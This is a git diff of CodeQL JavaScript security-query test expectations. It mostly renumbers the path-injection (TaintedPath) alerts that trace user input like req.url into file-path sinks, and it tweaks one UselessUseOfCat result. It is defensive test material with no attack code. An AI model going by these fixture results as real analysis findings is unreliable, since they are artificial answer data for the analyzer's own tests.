| pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 | req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | | handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | | handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | @@ -1114,18 +1114,18 @@ subpaths | tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | | tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. | tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. | tainted-require.js:6:19:6:37 | req.param("module") | user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. | tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | @@ -1141,8 +1141,8 @@ subpaths | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | diff --git 